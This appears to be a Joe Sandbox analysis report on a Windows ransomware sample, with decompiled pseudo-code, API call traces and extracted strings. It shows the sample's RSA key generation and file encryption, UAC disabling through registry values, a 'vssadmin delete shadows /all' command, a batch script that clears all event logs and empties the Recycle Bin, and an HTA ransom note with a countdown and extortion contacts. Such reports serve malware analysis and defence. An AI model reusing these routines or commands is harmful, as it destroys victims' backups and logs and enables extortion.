    				 *0x403ab3 = lstrlenA("<html><head><hta:application id=1\r\nshowInTaskBar=no\r\ncaption=no\r\nborder=none\r\ninnerBorder=no\r\nscroll=no\r\ncontextmenu=no\r\nwindowstate=maximize />\r\n<script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!=\'undefined\'?Y:now.getFullYear();Z=Z?Z-1:now.getMonth();D=typeof(D)!=\'undefined\'?D:now.getDate();H=typeof(H)!=\'undefined\'?H:now.getHours();M=typeof(M)!=\'undefined\'?M:now.getMinutes();var endDate=new Date(Y,Z,D,H,M,s+1);var i=setInterval(function(){var t=endDate.getTime()-now.getTime();if(t<0){clearInterval(i);alert(\'Time is up!\');}else{var d=Math.floor(t/864e5);var h=Math.floor(t/36e5)%24;var o=Math.floor(t/6e4)%60;var p=Math.floor(t/1e3)%60;var i=\'<div style=\"width:90px;float:left;text-align:center\"><div style=\"font-size:65px;\">\';var l=\'</div><div>\';var e=\'</div></div><div style=\"float:left;font-size:60px;\">:</div>\';document.getElementById(\'X\').innerHTML=i+d+l+\'Day\'+e+i+h+l+\'Hours\'+e+i+o+l+\'Minutes\'+e+i+p+l+\'Seconds\';if(!p&&!o&&!d&&!h){clearInterval(i);alert(\'Time is up!\');}}now.setSeconds(now.getSeconds()+1);},1000);}C(00,00,12,04,05,2019);</script></head><body style=\'text-align:center;background:#000\'></br></br></br><h2 style=\'font-size:40px;color:#b00\'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonStokton@tutanota.com</h2></br></br><h1 style=\'color:#FFF\'>Your<h2 style=\'font-size:40px;color:#00F\'> [ID]XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!</br>Attention!!!</br>At the end of this time, the private key for generating the decoder will be destroyed. \nFiles will not be restored!</h1></br></br><div id=\'X\' style=\'position:absolute;left:40%;color:#F00\'></div></body></html>");
    				MultiByteToWideChar(3, 0,  *(_t153 - 0x34), 0xffffffff, 0x4046f4, 0x19);
    				 *0x4046f4 = 0x2e;
    				_t144 =  *(_t153 - 0x24);
    				asm("cld");
    				memcpy(_t144,  *(_t153 - 0x34), 0x19);
    				_t147 = _t144;
    				 *_t147 = 0x2e;
    				lstrcatA(_t147, "\\shell\\open\\command");
    				RegCreateKeyA(0x80000000, _t147, _t153 - 0x20); // executed
    				_t148 =  &(_t147[0x200]);
    				lstrcatA(_t148, "C:\\Windows\\System32\\mshta.exe ");
    				lstrcatA(_t148, "\"c:\\Decoding help.hta\"");
    				RegSetValueExA( *(_t153 - 0x20), 0x403003, 0, 1, _t148, lstrlenA(_t148));
    				RegCloseKey( *(_t153 - 0x20));
    				SHChangeNotify(0x8000000, 0, 0, 0); // executed
    				GetEnvironmentVariableA("ComSpec",  *(_t153 - 0x24), 0x5dc); // executed
    				ShellExecuteA(0, 0,  *(_t153 - 0x24), "/c vssadmin delete shadows /all", 0, 0); // executed
    				GlobalFree( *(_t153 - 0x24)); // executed
    				SetErrorMode(1); // executed
    				E00401DE7("SeBackupPrivilege", 0); // executed
    				E00401DE7("SeRestorePrivilege", 0); // executed
    				while(1) {
    					E004016FF(); // executed
    					while(1) {
    						Sleep(0x7530); // executed
    						if( *0x403ab7 == 0) {
    							break;
    						}
    					}
    					Sleep(0x1388);
    					if( *((intOrPtr*)(_t153 - 0x38)) == 0) {
    						 *((intOrPtr*)(_t153 - 0x38)) =  *((intOrPtr*)(_t153 - 0x38)) + 1;
    						ShellExecuteA(0, "open", "\"c:\\Decoding help.hta\"", 0, 0, 5);
    					}
    					 *(_t153 - 0x28) = CreateFileA("C:\\windows\\clerlog.bat", 0xc0000000, 0, 0, 4, 0, 0);
    					WriteFile( *(_t153 - 0x28), "@echo off\r\nfor /F \"tokens=*\" %%G in (\'wevtutil.exe el\') DO (call:r \"%%G\")\r\ngoto End\r\n:r\r\nwevtutil.exe cl %1\r\ngoto :eof\r\n:End\r\nrd /s /q %systemdrive%\\$RECYCLE.BIN\r\ndel %0", 0xaa, _t153 - 0x34, 0);
    					CloseHandle( *(_t153 - 0x28));
    					ShellExecuteA(0, "open", "C:\\windows\\clerlog.bat", 0, 0, 0);
    				}
    			}

    Control-flow graph: node addresses 0x0040193b through 0x00401d26 (rendered graph not reproduced)

    APIs
    • CryptGenKey.ADVAPI32(?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?,orsa,00000000,00000000,004045E0,00000114,80000002), ref: 00401946
    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?), ref: 00401962
    • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?), ref: 00401980
    • CryptDestroyKey.ADVAPI32(?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001), ref: 00401988
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?), ref: 00401992
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000), ref: 004019A6
    • CryptImportKey.ADVAPI32(?,00403FBF,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000), ref: 004019C1
    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,@l,?,00000000,00000000,00000001), ref: 004019F9
    • CryptEncrypt.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A29
    • CryptDestroyKey.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A34
    • CryptReleaseContext.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF), ref: 00401A3E
    • RegSetValueExA.ADVAPI32(?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000), ref: 00401A59
    • RegSetValueExA.ADVAPI32(?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001), ref: 00401A74
    • RegCloseKey.ADVAPI32(?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000), ref: 00401A7C
    • RtlZeroMemory.KERNEL32(?,00008000,?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?), ref: 00401A89
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F,?,?,00008000,?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa), ref: 00401AA3
    • RegSetValueExA.ADVAPI32(?,PromptOnSecureDesktop,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F,?,?,00008000,?,?,rsa), ref: 00401AB9
    • RegSetValueExA.ADVAPI32(?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F), ref: 00401ACF
    • RegSetValueExA.ADVAPI32(?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000,00000004), ref: 00401AE5
    • RegCloseKey.ADVAPI32(?,?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000), ref: 00401AED
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004), ref: 00401B01
    • CryptImportKey.ADVAPI32(?,004045E0,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,?,ConsentPromptBehaviorAdmin,00000000,00000004), ref: 00401B1C
    • GetSystemTimeAsFileTime.KERNEL32(?,?,004045E0,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,?,ConsentPromptBehaviorAdmin,00000000), ref: 00401B63
    • FileTimeToSystemTime.KERNEL32(?,?,?,?,004045E0,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,?), ref: 00401B77
    • GetDateFormatA.KERNEL32(00000000,00000000,?,dd,MM,yyyy,04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS,0000000A,?,?,?,?,004045E0,00000114,00000000,00000000,@l,?), ref: 00401B90
    • lstrlenA.KERNEL32(<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000,?,dd,MM,yyyy,04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS,0000000A,?,?,?,?,004045E0,00000114,00000000,00000000,@l), ref: 00401B9A
    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000005,000000FF,004046F4,00000019,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000,?,dd,MM,yyyy,04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS,0000000A,?,?,?), ref: 00401BB4
    • lstrcatA.KERNEL32(?,\shell\open\command,00000003,00000000,00000005,000000FF,004046F4,00000019,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000,?,dd,MM,yyyy,04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS,0000000A,?), ref: 00401BD9
    • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 00401BE8
    • lstrcatA.KERNEL32(?,C:\Windows\System32\mshta.exe ,?,\shell\open\command,00000003,00000000,00000005,000000FF,004046F4,00000019,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000,?,dd,MM,yyyy,04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS), ref: 00401BF9
    • lstrcatA.KERNEL32(?,"c:\Decoding help.hta",?,C:\Windows\System32\mshta.exe ,?,\shell\open\command,00000003,00000000,00000005,000000FF,004046F4,00000019,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000,?), ref: 00401C04
    • lstrlenA.KERNEL32(?,?,"c:\Decoding help.hta",?,C:\Windows\System32\mshta.exe ,?,\shell\open\command,00000003,00000000,00000005,000000FF,004046F4,00000019,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000), ref: 00401C0A
    • RegSetValueExA.ADVAPI32(?,00403003,00000000,00000001,?,00000000,?,?,"c:\Decoding help.hta",?,C:\Windows\System32\mshta.exe ,?,\shell\open\command,00000003,00000000,00000005), ref: 00401C1D
    • RegCloseKey.ADVAPI32(?,?,00403003,00000000,00000001,?,00000000,?,?,"c:\Decoding help.hta",?,C:\Windows\System32\mshta.exe ,?,\shell\open\command,00000003,00000000), ref: 00401C25
    • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00401C35
    • GetEnvironmentVariableA.KERNEL32(ComSpec,?,000005DC,?,?,00403003,00000000,00000001,?,00000000,?,?,"c:\Decoding help.hta",?,C:\Windows\System32\mshta.exe ,?), ref: 00401C47
    • ShellExecuteA.SHELL32(00000000,00000000,?,/c vssadmin delete shadows /all,00000000,00000000), ref: 00401C5C
    • GlobalFree.KERNEL32 ref: 00401C64
    • SetErrorMode.KERNEL32(00000001,?,ComSpec,?,000005DC,?,?,00403003,00000000,00000001,?,00000000,?,?,"c:\Decoding help.hta",?), ref: 00401C6B
    • Sleep.KERNEL32(00007530,SeRestorePrivilege,00000000,SeBackupPrivilege,00000000,00000001,?,ComSpec,?,000005DC,?,?,00403003,00000000,00000001,?), ref: 00401C92
    • Sleep.KERNEL32(00001388,00007530,00007530,SeRestorePrivilege,00000000,SeBackupPrivilege,00000000,00000001,?,ComSpec,?,000005DC,?,?,00403003,00000000), ref: 00401CA9
    • ShellExecuteA.SHELL32(00000000,open,"c:\Decoding help.hta",00000000,00000000,00000005), ref: 00401CC9
    • CreateFileA.KERNEL32(C:\windows\clerlog.bat,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530,SeRestorePrivilege,00000000,SeBackupPrivilege,00000000,00000001,?), ref: 00401CE2
    • WriteFile.KERNEL32(?,@echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0,000000AA,00000005,00000000,C:\windows\clerlog.bat,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530,SeRestorePrivilege), ref: 00401CFD
    • CloseHandle.KERNEL32(?,?,@echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0,000000AA,00000005,00000000,C:\windows\clerlog.bat,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530), ref: 00401D05
    • ShellExecuteA.SHELL32(00000000,open,C:\windows\clerlog.bat,00000000,00000000,00000000), ref: 00401D1C
    Strings
    • SeBackupPrivilege, xrefs: 00401C72
    • \shell\open\command, xrefs: 00401BD3
    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-open, xrefs: 00401B27
    • EnableLUA, xrefs: 00401AC7
    • ConsentPromptBehaviorAdmin, xrefs: 00401ADD
    • ComSpec, xrefs: 00401C42
    • XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!<, xrefs: 00401B2D
    • dd,MM,yyyy, xrefs: 00401B83
    • "c:\Decoding help.hta", xrefs: 00401BFE, 00401CBD
    • C:\windows\clerlog.bat, xrefs: 00401CDD, 00401D10
    • /c vssadmin delete shadows /all, xrefs: 00401C50
    • orsa, xrefs: 00401A51
    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 00401A99
    • PromptOnSecureDesktop, xrefs: 00401AB1
    • @l, xrefs: 004019AB, 00401B06
    • 04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS, xrefs: 00401B7E
    • SeRestorePrivilege, xrefs: 00401C7E
    • C:\Windows\System32\mshta.exe , xrefs: 00401BF3
    • <html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined, xrefs: 00401B95
    • @echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0, xrefs: 00401CF5
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: Crypt$Value$CloseContextFileTime$ExecuteShelllstrcat$AcquireCreateDestroyEncryptExportImportReleaseSleepSystemlstrlen$ByteChangeCharDateEnvironmentErrorFormatFreeGlobalHandleMemoryModeMultiNotifyOpenVariableWideWriteZero
    • String ID: "c:\Decoding help.hta"$/c vssadmin delete shadows /all$04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS$<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined$@echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0$@l$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-open$C:\Windows\System32\mshta.exe $C:\windows\clerlog.bat$ComSpec$ConsentPromptBehaviorAdmin$EnableLUA$PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\$SeBackupPrivilege$SeRestorePrivilege$XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!<$\shell\open\command$dd,MM,yyyy$orsa
    • API String ID: 204179998-3801996818
    • Opcode ID: bab4de6a3842e2200fc4419f95baa4f4f36254ee96687c4dd4c72e7aacfdb836
    • Instruction ID: 1140f1e6a0d84ce1b2bbf66032a6f78f9ab0211b56a4c443091a9b8f8d6dd5e8
    • Opcode Fuzzy Hash: bab4de6a3842e2200fc4419f95baa4f4f36254ee96687c4dd4c72e7aacfdb836
    • Instruction Fuzzy Hash: 40A1D271B843097AEB21AB91CC43FDD7A79AB44B19F20403AF700790F1D7F96A149A6D
    Uniqueness

    Uniqueness Score: -1,00%

    Control-flow Graph

    • Executed
    • Not Executed
    C-Code - Quality: 65%
    			E004017A2() {
    				struct _SYSTEMTIME _v20;
    				struct _FILETIME _v28;
    				long* _v32;
    				void* _v36;
    				char* _v40;
    				long* _v44;
    				int _v48;
    				int _v52;
    				long _v56;
    				void* _v60;
    				CHAR* _t88;
    				int _t90;
    				int _t98;
    				long _t158;
    				void* _t186;
    				void* _t192;
    				char* _t195;
    				CHAR* _t196;
    				void* _t197;
    				void* _t201;
    
    				_v60 = 0;
    				_t88 = E00401781(0x8000); // executed
    				_v40 = _t88;
    				GetModuleFileNameA(0, _t88, 0x8000); // executed
    				_t90 = lstrcmpiA("hy:@", _v40); // executed
    				if(_t90 != 0) {
    					RegOpenKeyExA(0x80000002, 0x4039af, 0, 0xf013f,  &_v36); // executed
    					RegSetValueExA(_v36, 0x403a4f, 0, 1, 0x403a56, lstrlenA(0x403a56));
    					RegSetValueExA(_v36, 0x403a6d, 0, 1, 0x403a79, lstrlenA(0x403a79));
    					RegCloseKey(_v36);
    					CopyFileA(_v40, 0x403a79, 0); // executed
    				}
    				RegOpenKeyExA(0x80000002, 0x40397b, 0, 0xf013f,  &_v36); // executed
    				_v52 = 0x114;
    				if(RegQueryValueExA(_v36, 0x4037e8, 0, 0, 0x4045e0,  &_v52) != 0 || _v52 != 0x114) {
    					goto L7;
    				} else {
    					_v52 = 0x500;
    					if(RegQueryValueExA(_v36, 0x4037e9, 0, 0, 0x4040e0,  &_v52) != 0 || _v52 != 0x500) {
    						while(1) {
    							L7:
    							_t98 = CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
    							while(_t98 == 0) {
    								_t158 = GetLastError();
    								if(_t158 != 0x80090019) {
    									if(_t158 != 0x8009000f) {
    										break;
    									}
    									_t98 = CryptAcquireContextA( &_v44, 0, 0, 1, 8);
    									continue;
    								}
    								GetEnvironmentVariableA(0x40380f, _v40, 0x5dc);
    								ShellExecuteA(0, 0, _v40, 0x4038e1, 0, 0);
    								Sleep(0x64);
    								goto L7;
    							}
    							_push( &_v32);
    							_push(0x8000001);
    							_push(1);
    							_push(_v44);
    							L00401F86(); // executed
    							_v48 = 0x494;
    							_push( &_v48);
    							_push(_v40);
    							_push(0);
    							_push(7);
    							_push(0);
    							_push(_v32);
    							L00401F80(); // executed
    							_v48 = 0x114;
    							_push( &_v48);
    							_push(0x4045e0);
    							_push(0);
    							_push(6);
    							_push(0);
    							_push(_v32);
    							L00401F80();
    							CryptDestroyKey(_v32);
    							CryptReleaseContext(_v44, 0);
    							CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
    							CryptImportKey(_v44, 0x403fbf, 0x114, 0, 0, 0x403abb);
    							_v56 = 4;
    							_t197 = _v40;
    							_t186 = 0x4040e0;
    							do {
    								_v48 = 0xf4;
    								asm("cld");
    								memcpy(_t186, _t197, 0xf4);
    								_t201 = _t201 + 0xc;
    								_push(0x500);
    								_push( &_v48);
    								_push(_t186);
    								_push(0);
    								_push(0);
    								_push(0);
    								_push( *0x403abb); // executed
    								L00401F7A(); // executed
    								_t186 = _t197 + 0x1f4;
    								_t39 =  &_v56;
    								 *_t39 = _v56 - 1;
    							} while ( *_t39 != 0);
    							_v48 = 0xc4;
    							asm("cld");
    							memcpy(_t186, _t197, 0xc4);
    							_t201 = _t201 + 0xc;
    							_push(0x500);
    							_push( &_v48);
    							_push(_t186);
    							_push(0);
    							_push(1);
    							_push(0);
    							_push( *0x403abb); // executed
    							L00401F7A(); // executed
    							CryptDestroyKey( *0x403abb); // executed
    							CryptReleaseContext(_v44, "true");
    							RegSetValueExA(_v36, 0x4037e8, 0, 3, 0x4045e0, 0x114);
    							RegSetValueExA(_v36, 0x4037e9, 0, 3, 0x4040e0, 0x500);
    							goto L16;
    						}
    					} else {
    						L16:
    						RegCloseKey(_v36);
    						_push(0x8000);
    						_push(_v40);
    						L00401EF6();
    						RegOpenKeyExA(0x80000002, 0x403940, 0, 0xf013f,  &_v36); // executed
    						RegSetValueExA(_v36, 0x4039de, 0, 4, _v40, 4);
    						RegSetValueExA(_v36, 0x4039f4, 0, 4, _v40, 4);
    						RegSetValueExA(_v36, 0x4039fe, 0, 4, _v40, 4);
    						RegCloseKey(_v36);
    						CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
    						CryptImportKey(_v44, 0x4045e0, 0x114, 0, 0, 0x403abb);
    						_v56 = 0x4035b5;
    						_v56 = _v56 - 5;
    						_push(4);
    						asm("lodsd");
    						asm("bswap edx");
    						asm("xlatb");
    						asm("stosb");
    						asm("rol edx, 0x6");
    						asm("loop 0xfffffff5");
    						asm("loop 0xffffffe6");
    						 *0x004035B4 = 0x33;
    						GetSystemTimeAsFileTime( &_v28);
    						_v28.dwHighDateTime = _v28.dwHighDateTime + 0x258;
    						FileTimeToSystemTime( &_v28,  &_v20);
    						GetDateFormatA(0, 0,  &_v20, 0x403804, 0x403449, 0xa);
    						 *0x403ab3 = lstrlenA(0x403006);
    						MultiByteToWideChar(3, 0, _v56, 0xffffffff, 0x4046f4, 0x19);
    						 *0x4046f4 = 0x2e;
    						_t192 = _v40;
    						asm("cld");
    						memcpy(_t192, _v56, 0x19);
    						_t195 = _t192;
    						 *_t195 = 0x2e;
    						lstrcatA(_t195, 0x4037d4);
    						RegCreateKeyA(0x80000000, _t195,  &_v36); // executed
    						_t196 =  &(_t195[0x200]);
    						lstrcatA(_t196, 0x403a94);
    						lstrcatA(_t196, 0x403a56);
    						RegSetValueExA(_v36, 0x403003, 0, 1, _t196, lstrlenA(_t196));
    						RegCloseKey(_v36);
    						SHChangeNotify(0x8000000, 0, 0, 0); // executed
    						GetEnvironmentVariableA(0x40380f, _v40, 0x5dc); // executed
    						ShellExecuteA(0, 0, _v40, 0x4038c1, 0, 0); // executed
    						GlobalFree(_v40); // executed
    						SetErrorMode(1); // executed
    						E00401DE7(0x403a2a, 0); // executed
    						E00401DE7(0x403a3c, 0); // executed
    						while(1) {
    							E004016FF(); // executed
    							while(1) {
    								Sleep(0x7530); // executed
    								if( *0x403ab7 == 0) {
    									break;
    								}
    							}
    							Sleep(0x1388);
    							if(_v60 == 0) {
    								_v60 = _v60 + 1;
    								ShellExecuteA(0, 0x40393b, 0x403a56, 0, 0, 5);
    							}
    							_v44 = CreateFileA(0x4037ed, 0xc0000000, 0, 0, 4, 0, 0);
    							WriteFile(_v44, 0x403817, 0xaa,  &_v56, 0);
    							CloseHandle(_v44);
    							ShellExecuteA(0, 0x40393b, 0x4037ed, 0, 0, 0);
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,00401160,?,00401160,00004000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,00401160,?,00401160,00004000), ref: 00401797
    • GetModuleFileNameA.KERNEL32(00000000,00000000,00008000,00008000), ref: 004017C4
    • lstrcmpiA.KERNEL32(00403A79,?,00000000,00000000,00008000,00008000), ref: 004017D1
    • RegOpenKeyExA.ADVAPI32(80000002,004039AF,00000000,000F013F,?,00403A79,?,00000000,00000000,00008000,00008000), ref: 004017EF
    • lstrlenA.KERNEL32(00403A56,80000002,004039AF,00000000,000F013F,?,00403A79,?,00000000,00000000,00008000,00008000), ref: 004017F9
    • RegSetValueExA.ADVAPI32(?,00403A4F,00000000,00000001,00403A56,00000000,00403A56,80000002,004039AF,00000000,000F013F,?,00403A79,?,00000000,00000000), ref: 00401810
    • lstrlenA.KERNEL32(00403A79,?,00403A4F,00000000,00000001,00403A56,00000000,00403A56,80000002,004039AF,00000000,000F013F,?,00403A79,?,00000000), ref: 0040181A
    • RegSetValueExA.ADVAPI32(?,00403A6D,00000000,00000001,00403A79,00000000,00403A79,?,00403A4F,00000000,00000001,00403A56,00000000,00403A56,80000002,004039AF), ref: 00401831
    • RegCloseKey.ADVAPI32(?,?,00403A6D,00000000,00000001,00403A79,00000000,00403A79,?,00403A4F,00000000,00000001,00403A56,00000000,00403A56,80000002), ref: 00401839
    • CopyFileA.KERNEL32(?,00403A79,00000000), ref: 00401848
    • RegOpenKeyExA.ADVAPI32(80000002,0040397B,00000000,000F013F,?,00403A79,?,00000000,00000000,00008000,00008000), ref: 00401862
    • RegQueryValueExA.ADVAPI32(?,004037E8,00000000,00000000,004045E0,00000114,80000002,0040397B,00000000,000F013F,?,00403A79,?,00000000,00000000,00008000), ref: 00401883
    • RegQueryValueExA.ADVAPI32(?,004037E9,00000000,00000000,004040E0,00000500,?,004037E8,00000000,00000000,004045E0,00000114,80000002,0040397B,00000000,000F013F), ref: 004018B1
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,004037E8,00000000,00000000,004045E0,00000114,80000002,0040397B,00000000,000F013F,?), ref: 004018D7
    • GetLastError.KERNEL32(?,00000000,00000000,00000001,F0000000,?,004037E8,00000000,00000000,004045E0,00000114,80000002,0040397B,00000000,000F013F,?), ref: 004018E0
    • GetEnvironmentVariableA.KERNEL32(0040380F,?,000005DC,?,00000000,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,?,004037E8,00000000), ref: 004018F9
    • ShellExecuteA.SHELL32(00000000,00000000,?,004038E1,00000000,00000000), ref: 0040190E
    • Sleep.KERNEL32(00000064,00000000,00000000,?,004038E1,00000000,00000000,0040380F,?,000005DC,?,00000000,00000000,00000001,00000008,?), ref: 00401915
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,?,004037E8,00000000,00000000,004045E0,00000114), ref: 00401931
    • CryptGenKey.ADVAPI32(?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?,004037E8,00000000,00000000,004045E0,00000114,80000002), ref: 00401946
